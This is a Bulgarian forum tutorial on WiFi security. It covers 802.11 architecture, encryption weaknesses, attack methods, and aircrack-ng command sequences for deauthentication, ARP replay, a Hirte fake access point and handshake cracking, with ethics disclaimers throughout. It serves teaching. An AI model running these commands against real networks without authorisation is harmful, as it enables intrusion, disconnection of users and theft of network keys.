

Въведение
С навлизането на безжичните технологии в почти всяко кътче на съвременния свят, разбирането на тяхната структура, уязвимости и защита става не просто полезно, а наложително. Темата за Wireless Hacking често предизвиква асоциации с хакери в тъмни стаи, но истината е, че зад нея стоят дълбоки познания по мрежови протоколи, криптография, хардуер и етика. Настоящата статия е с изцяло образователна цел и цели да даде задълбочен поглед върху WiFi технологиите и техните слаби места.Важно: Цялата информация в тази статия е с образователна цел. Неупълномощен достъп до чужди мрежи е незаконен!
Основни термини и архитектура на WiFi
- AP (Access Point): Точка за достъп до мрежата.
- BSSID: MAC адрес на точката за достъп.
- ESSID: Името на мрежата, което виждаме при сканиране (напр. „TP-Link_5G“).
- MAC: Уникален хардуерен адрес на мрежови адаптер.
- Канали: Физическите честоти, по които работят безжичните сигнали (1–14).
Антени и предаване
Използват се различни видове антени: диполни (омни), насочени тип Yaggi, импровизирани като Pringles или WindSurfer. Мощността на предаване (txpower) е ограничена според регионалните регулации – до 0.5W, но някои системи позволяват заобикаляне чрез редакция на kernel-level настройки.
WiFi Мрежови Режими
- Master: Режим на точка за достъп
- Managed: Класически клиентски режим
- Ad-Hoc: Peer-to-peer комуникация
- Monitor: Пасивно подслушване на пакети
- Repeater и Mesh: За удължаване обхват
Видове фреймове
- Управляващи (Management): Beacon, Probe, Authentication, Association
- Контролни (Control): RTS/CTS, ACK
- Данни (Data): Пренасят полезната информация
Протоколи и криптиране
- WEP: Силно остарял и уязвим – използва RC4 и 24-битов IV. Лесен за разбиване с под 100 000 пакета.
- WPA / WPA-TKIP: Надгражда WEP, но все още използва RC4. Уязвим при DeAuth атаки и захващане на handshake.
- WPA2 / AES: Най-сигурният до момента стандарт. Но слабите пароли все още го правят податлив на brute-force атаки.
Методи на атака
- Пасивно подслушване: Чрез режим Monitor се събират фреймове без да се изпраща трафик.
- ARP Replay и Injection: Провокиране на активност за събиране на пакети.
- Hirte / Caffe-Latte: Използват клиентски сонди за извличане на ключове.
- Rogue AP и Karma: Създаване на фалшиви точки за достъп за подвеждане на клиенти.
- WPS Bruteforce: Поради слабо проектиран алгоритъм, WPS може да се разбие за под 2 часа.
Инструменти за анализ и атака
- Aircrack-ng: Най-популярният набор от инструменти – airmon-ng, airodump-ng, aireplay-ng, aircrack-ng
- Wireshark: За визуализиране на трафик и фреймове
- Kismet, Reaver, Gerix, WiGLE: Разширени функции за сканиране, откриване и атаки
Полезни команди
PHP:
airodump-ng wlan0 # Сканира наличните мрежи
airmon-ng start wlan0 # Активира монитор режим
airodump-ng --bssid [BSSID] --channel [CH] -w dump mon0 # Събиране на пакети
aireplay-ng --deauth 10 -a [AP_MAC] -c [Client_MAC] mon0 # Деаутентикация
aircrack-ng dump.cap # Кракинг на събраните пакети
Тези команди са основата на безжичния анализ и симулация на атаки. Те дават възможност да сканираш ефективно мрежите около теб, да наблюдаваш трафика, да провокираш активност чрез инжекции и да проведеш кракване на събраните handshake файлове. Важно е да се използват в контролирана среда с разрешение.
Практически демонстрации
ARP Replay атака:
-
CSS:
airmon-ng start wlan0 airodump-ng --bssid [BSSID] --channel [CH] -w dump mon0 aireplay-ng --arpreplay -b [BSSID] -h [Client_MAC] mon0 aircrack-ng dump.cap
Hirte атака:
-
CSS:
airbase-ng -W 1 -c 6 -N --essid [TargetSSID] mon0 airodump-ng --bssid [FakeBSSID] -w dump mon0 aircrack-ng dump.cap
Тези демонстрации показват как се провеждат реални атаки в лабораторни условия. ARP Replay атаката е класически метод за предизвикване на активност в мрежата, докато Hirte атаката цели да извлече ключове чрез взаимодействие с клиентски устройства.
Етика и отговорност
Въпреки че техническата част е интригуваща, основният принцип остава: без разрешение, всяка намеса е незаконна. Целта на знанието е да защитава, не да руши.
Заключение
Безжичната сигурност не е даденост – тя е непрекъсната битка. Познаването на възможностите за атака означава по-добра защита. Надяваме се тази статия да бъде вдъхновение не за разрушаване, а за изграждане на по-сигурни системи и съзнателни ИТ специалисти."Истинската сила не е в това да пробиеш системата, а да я направиш непробиваема."
🖋 Автор: Тони Ангелчовски Ексклузивно за форума Дигитален Свят

